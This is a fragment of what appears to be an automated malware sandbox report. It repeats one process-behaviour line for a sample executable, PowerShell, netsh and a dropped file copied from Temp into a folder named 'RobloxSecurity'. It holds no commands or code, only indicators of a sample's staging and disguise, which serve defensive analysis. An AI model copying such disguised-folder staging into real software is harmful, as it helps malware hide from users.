                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
